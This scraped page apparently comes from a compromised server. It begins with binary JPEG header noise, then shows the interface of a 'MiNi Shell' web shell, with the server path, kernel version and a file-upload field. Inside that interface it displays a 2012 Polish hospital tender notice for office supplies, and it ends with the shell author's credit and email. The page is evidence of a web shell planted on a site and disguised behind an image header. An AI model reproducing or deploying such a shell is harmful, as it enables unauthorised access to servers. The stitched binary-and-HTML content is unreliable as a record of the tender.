JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120531/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120531/182638-N-2012.html

<p class="kh_header"><b>Radom: Zakup i dostawę artykułów biurowych dla potrzeb Placówek Radomskiego Szpitala Specjalistycznego.</b><br>
<b>Numer ogłoszenia: 182638 - 2012; data zamieszczenia: 31.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Radomski Szpital Specjalistyczny im. dr Tytusa Chałubińskiego , ul. Tochtermana 1, 26-610 Radom, woj. mazowieckie, tel. 048 3615285, 3615284, faks 048 3615213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.radom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawę artykułów biurowych dla potrzeb Placówek Radomskiego Szpitala Specjalistycznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Sukcesywny zakup i dostawa artykułów biurowych dla potrzeb Placówek Radomskiego Szpitala Specjalistycznego.
Lp.	
Nazwa i opis przedmiotu zamówienia 
	J.m.	Ilość 
1.	Papier xero (do wszystkich urządzeń biurowych) format A4, gramatura 80g/m2, białość min. CIE 150, 1op.=500 ark.	Op.	5.500
2.	Papier xero (do wszystkich urządzeń biurowych) format A4, gramatura 160g/m2, białość min. CIE 150, 1op.=500 ark.	Op.	24
3.	Papier xero (do wszystkich urządzeń biurowych) format A3, gramatura 80g/m2, białość min. CIE 150, 1op.=500 ark.	Op.	360
4.	Rolki do faxu, format: 216mmx30m, 210mmx30m	Szt.	200
5.	Segregator z mechanizmem dźwigniowym, format A4, szerokość grzbietu 75-80mm, wykonany z twardej tektury pokrytej papierem, wkładana etykieta na grzbiecie 	Szt.	2.400
6.	Segregator z mechanizmem dźwigniowym, A4, szerokość grzbietu 30-40 mm, wykonany z twardej tektury pokrytej papierem, wkładana etykieta na grzbiecie 	Szt.	720
7.	Segregator z mechanizmem dźwigniowym, format A4, szerokość grzbietu 75-80 mm, oklejony z obu stron trwałym tworzywem, metalowe okucie na dolnych krawędziach 	Szt.	240
8.	Segregator z mechanizmem dźwigniowym, format A4, szerokość grzbietu 30-40 mm, oklejony z obu stron trwałym tworzywem, metalowe okucia na dolnych krawędziach 	Szt.	240
9.	Koszulki foliowe na dokumenty (bezbarwne), otwierane z góry, typ krystaliczny, wykonane z grubej folii, format A4, umożliwiające wpięcie do każdego typu segregatora	Op.	480
10.	Ofertówki twarde (bezbarwne), wykonane z twardej folii PCV, otwierane z góry i z prawej strony, typ-krystaliczny, format A4, grubość ok. 0,20 mikrona	Szt.	3.600
11.	Skoroszyt, format A4, wykonany z kartonu ok. 280g/m2, kolor biały z nadrukiem	Szt.	4.800
12.	Skoroszyt zawieszony, format A4, wykonany z kartonu ok. 280g/m2, kolor biały	Szt.	240
13.	Skoroszyt A5 przednia okładka przezroczysta, tylna kolorowa, wykonany ze sztywnego PCV	Szt.	100
14.	Skoroszyt z zapięciem do segregatora, format A4, z PCV	Szt.	1.200
15.	Skoroszyt plastikowy miękki, format A4, przednia okładka przezroczysta, druga kolorowa, wyposażona w dwustronny pasek brzegowy do opisywania 	Szt.	2.800
16.	Teczka, format A4, wykonana z mocnego kartonu ok. 350g/m2, wiązana, kolor biały	Szt.	2.400
17.	Teczka z gumką na haczyki, format A4, wykonana z kartonu ok. 350g/m2, kolor biały	Szt.	1.200
18.	Nożyczki biurowe- ze stali nierdzewnej, rękojeść z niełamliwego plastiku, długość 16 cm	Szt.	72
19.	Pinezki, kolor srebrny	Op.	96
---	Spinacze metalowe, kształt okrągły, rozmiar:
20.	-28 mm	Op.	3.600
21.	-33 mm	Op.	720
22.	-50 mm	Op.	240
---	Klipsy biurowe galwanizowane, rozmiar:
23.	-19 mm	Szt.	120
24.	-25 mm	Szt.	120
25.	-32 mm	Szt.	120
26.	-41 mm	Szt.	120
27.	-51 mm	Szt.	120
28.	Naklejka - cena, taśma na rolce	Szt.	720
29.	Taśma biurowa samoprzylepna, na rolce, przezroczysta, bezbarwna, szerokość 24-25 mm, długość 30 m	Szt.	1.400
30.	Taśma pakowa z klejem, na rolce, przeznaczona do zaklejania kartonów, szerokość 45-50 mm, długość 45-50 m	Szt.	120
31.	Taśma do metkownicy, 1-rzędowa, półokrągła, kolorowa	Szt.	240
32.	Klej biurowy uniwersalny w tubie, do klejenia papieru i tektury pojemność ok. 40 ml	Szt.	1.200
33.	Klej do papieru w płynie z aplikatorem, pojemność ok. 50 ml	Szt.	120
34.	Kalka przebitkowa (maszynowa) A4	Op.	2.400
35.	Kalka przebitkowa (maszynowa) A3	Op.	2.400
36.	Tusz do stempli ręcznych i automatów samotuszujących, w pojemniku z aplikatorem, pojemność 25 ml, kolor: czarny, czerwony	Szt.	240
37.	Poduszka do stempli ręcznych, w pudełku z tworzywa, rozmiar min. 11x7cm	Szt.	15
38.	Zszywacz biurowy, część mechaniczna z metalu, zszywanie do 30 kartek, na zszywki nr 24/6 i 26/6 	Szt.	120
39.	Zszywacz biurowy z długim ramieniem, zszywanie do 130 kartek, regulowana głębokość wsunięcia do 70 mm, na zszywki 24/6 i 26/6, gwarancja min. 3 lata	Szt.	12
---	Zszywki biurowe, rozmiar:
40.	zszywające do 30 kartek	Op.	7.200
41.	zszywające od 50 do 60 kartek	Op.	3.600
42.	Dziurkacz biurowy, metalowa konstrukcja, duża dźwignia, dziurawość min. 30 kartek, gwarancja min. 3 lata	Op.	96
43.	Długopis jednorazowy, żłobiony w miejscu chwytania, kolor: czarny, niebieski, czerwony, zielony	Szt.	3.600
44.	Długopis żelowy, z gumowym uchwytem, grubość linii pisania 0,3-0,32 mm, długość linii min. 1200 m, kolor: czarny, niebieski, czerwony, zielony	Szt.	400
45.	Flamaster biurowy, kolor: czarny, niebieski, czerwony, zielony	Szt. 	2.400
46.	Marker do tablic suchościeralnych, kolor: czarny, czerwony	Szt. 	120
47.	Cienkopis, grubość linii pisania 0,4 mm, kolor: czarny, niebieski, czerwony, zielony	Szt. 	500
48.	Marker permanentny, wodoodporny, do pisania na każdej powierzchni, w tym na tkaninie, kolor: czarny	Szt. 	1.500
49.	Marker cienkopiszący, olejowy do znakowania na powierzchniach szorstkich i gładkich, wodoodporny, kolor: czarny	Szt. 	144
50.	Foliopis do pisania na szkle, folii, kliszy, płycie CD, grubość linii pisania 0,4-0,6 mm, kolor: czarny	Szt. 	480
51.	Ołówek, twardość HB	Szt. 	720
52.	Gumka ołówkowa, mała	Szt.	120
53.	Linijka z tworzywa, długość 25-30 cm	Szt.	48
54.	Linijka z tworzywa, długość 50 cm	Szt.	24
55.	Temperówka plastikowa - jednotorowa	Szt.	60
56.	Koperty C6 o wym. 114x162 mm, listowe, samoklejące, białe	Szt.	96.000
57.	Koperty B5 o wym. 176x250 mm, samoklejące, brązowe lub szare	Szt.	96.000
58.	Koperty C4 o wym. 229x324 mm, samoklejące, brązowe	Szt.	24.000
59.	Koperty C4 o wym. 229x324 mm, samoklejące, białe	Szt.	25.000
60.	Koperty B4 o wym. 250x353 mm, samoklejące, białe, z rozszerzonymi bokami i spodem	Szt.	1.200
61.	Koperty B4 o wym. 250x353 mm, samoklejące, białe	Szt.	1.200
62.	Koperty z folią bąbelkową, wymiar zewnętrzny 290x370 mm	Szt.	240
63.	Koperty z folią bąbelkową, wymiar zewnętrzny 200x275 mm	Szt.	240
64.	Zeszyt A4, 96-100 kartkowy, kratka, okładka miękka	Szt.	1.200
65.	Zeszyt A4, 96-100 kartkowy, kratka, okładka twarda	Szt.	720
66.	Zeszyt A5, 80 kartkowy, kratka, okładka miękka	Szt.	1.200
67.	Skorowidz szyty, rozmiar 2/3 A4, ok. 100 kartkowy	Szt.	48
68.	Skorowidz szyty A4, ok. 100 kartkowy	Szt.	20
69.	Dyskietki formatowane 3,5 MF 2 HD	Szt.	48
70.	Płyta CD-R, pojemność 700 MB	Szt.	15.000
71.	Płyta CD-Rw wielokrotnego zapisu, pojemność 700 MB	Szt.	2.400
72.	Płyta DVD+R, pojemność 4,7 GB	Szt.	720
73.	Płyta CD-Rw, 700 MB, 80 MIN.	Szt.	240
---	Grzbiety do bindowania dokumentów A4, różne kolory:
74.	-32 mm	Szt.	1.400
75.	-25 mm	Szt.	1.400
76.	-21 mm	Szt.	1.400
77.	-16 mm	Szt.	2.800
78.	-12,5 mm	Szt.	2.800
79.	-8,00 mm	Szt.	2.800
80.	-6,00 mm	Szt.	2.800
---	Okładki do bindowania, format A4:
81.	- wierzchnia foliowa, przezroczysta	Szt.	16.000
82.	- spodnia ze sztywnego kartonu, kolor: czarny, brązowy, granatowy, zielony	Szt.	16.000
---	Folia do laminacji, grubość folii 100 mikronów:
83.	-format A3	Szt.	800
84.	-format A4	Szt.	2.000
85.	-format A5	Szt.	1.400
86.	-rozmiar 75x105 mm	Szt.	1.000
87.	Przekładki do segregatora A4 wykonane z grubego kartonu, podłużne, z 5 otworami, różne kolory, wymiary ok. 98x240 mm	Op.	12
88.	Kalkulator - 12 pozycyjny z funkcją: zmiany znaku, obliczania procentu, wybór trybu przecinka i ilości miejsc po przecinku, duże klawisze	Szt.	48
89.	Zakreślacz- grubość linii 1,5 mm, z zatyczką, pozostawiający wyraźny i trwały ślad, różne kolory	Szt.	120
90.	Książka do podpisu - format A4, okładka z twardego kartonu pokrytego folią PP	Szt.	24
---	Grzbiety wsuwane A4, zaokrąglone krawędzie ułatwiają nasuwanie grzbietu na dokument, różne kolory:	
91.	-pojemność od 40 do 100 kartek	Szt.	400
92.	-pojemność do 30 kartek	Szt.	800
93.	Koperty A-5 o wym. 148x210 mm, samoklejące, białe	Szt.	1.200
94.	Koperty DL o wym. 110x220 mm, samoklejące, białe	Szt.	1.200
95.	Papier ozdobny MARMUREK, dwustronny, gramatura 90g/m2, do drukarek atramentowych i laserowych A4, 1 op.=100 ark., kolor: biało-szary, biały	Op.	4
96.	Papier biurowy, gramatura 120g/m2, format A4, do kolorowych drukarek atramentowych i laserowych, satynowa i gładka powierzchnia, wysoka sztywność, kolor: białość CIE 161, 1 op.=250 ark.,	Op.	5
97.	Papier xero kolorowy (do wszystkich urządzeń biurowych), format A4, gramatura 80g/m2, różne kolory (mix pastelowy) 1op.=500 arkuszy 	Op.	16
98.	Papier xero kolorowy (do wszystkich urządzeń biurowych), format A4, gramatura 160g/m2, różne kolory (mix pastelowy) 1op.=250 arkuszy	Op.	16
99.	Etykiety samoprzylepne, format A4, rozmiar pojedynczej etykiety: 210x297 mm, gładkie, do drukarek atramentowych i laserowych oraz kserokopiarek, kolor: biały, 1 op.=100 ark.	Op. 	5
100.	Koperty na płyty CD/DVD z okienkiem	Szt.	50.000
101.	Segregator z mechanizmem dźwigniowym, format A4, szerokość grzbietu 25 mm, oklejony z obu stron trwałym tworzywem, metalowe okucia na dolnych krawędziach	Szt.	240
102.	Gąbka do tablic suchościeralnych	Szt.	24
103.	Zszywki biurowe zszywające powyżej 100 kartek	Op. 	1.200
104.	Taśma biurowa samoprzylepna, na rolce, przezroczysta, bezbarwna, szerokość 50 mm, długość 10 m	Szt. 	480
Zapotrzebowanie na okres 2 lat.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.23.40.00-8, 30.14.12.00-1, 30.19.70.00-6, 30.23.73.80-6, 30.19.30.00-8, 30.19.90.00-0, 22.80.00.00-8, 24.91.00.00-6, 39.24.10.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca posiada wiedzę i doświadczenie, jeżeli wykaże, że w ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonał dostawy oferowanego towaru na kwotę min. 70.000,00 PLN (słownie: siedemdziesiąt tysięcy złotych).
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia powinni wykazać, że warunek określony powyżej spełniają łącznie.
W przypadku gdy w wykazie zamówień przedstawionym przez Wykonawcę rozliczenia między Wykonawcą, a Zamawiającym za wykonane zamówienie zostało dokonane w innej walucie niż w złotych polskich, Wykonawca (do celu oceny oferty) dokona przeliczenia wartości wykonanych zamówień w innej walucie niż złoty polski na  podstawie średniego kursu złotego w stosunku do walut obcych określonego w tabeli kursów średnich walut obcych Narodowego Banku Polskiego (http://www.nbp.pl) na dzień zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych tj. dn. 2012.05.31.
	Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na dzień otwarcia ofert na podstawie złożonych wraz z ofertą oświadczeń i dokumentów według metody spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">wykonawca ma obowiązek dostarczyć po 1 próbce  każdej pozycji określonej 
w opisie przedmiotu zamówienia.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>dokument lub dokumenty, z których będzie wynikać uprawnienie do podpisania oferty:
1) wpis do Krajowego Rejestru Sądowego lub ewidencji działalności gospodarczej, które mogą być złożone w formie kopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub
2) Pełnomocnictwo - w oryginale lub w postaci kopii poświadczonej notarialnie,
2. wypełniony Formularz Oferty,
3. wypełniony Formularz cenowy/Specyfikacja techniczna .</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza następujące zmiany umowy: 
a) ceny jednostkowe brutto mogą ulec zmianie w przypadku zmiany stawki podatku VAT wprowadzonej przepisami prawa - mogą się zmienić od dnia wejścia w życie danego aktu prawnego, przy czym zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez zmian, 
b) ceny jednostkowe brutto mogą również ulec zmianie po upływie roku obowiązywania umowy o wskaźnik inflacji ogłoszony przez prezesa GUS za ostatni kwartał przed upływem roku obowiązywania umowy (do obliczeń zostanie użyty wskaźnik cen towarów i usług konsumpcyjnych za odpowiedni kwartał obliczony w stosunku do kwartału poprzedzającego), 
c) przedmiotem zmian treści umowy mogą być również zmiany adresowe lub rejestrowe stron umowy,
d) przedmiotem zmian treści umowy może być również zmiana statusu prawnego stron umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.szpital.radom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Radomski Szpital Specjalistyczny
Dział Zamówień Publicznych, Funduszy Strukturalnych i Zaopatrzenia III piętro pok.309
26-610 Radom
ul. Lekarska 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.06.2012 godzina 11:00, miejsce: Radomski Szpital Specjalistyczny ul. Lekarskiej 4 
26-610  Radom Dział Zamówień Publicznych Funduszy Strukturalnych
 i Zaopatrzenia  III piętro pok 308 lub 309..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com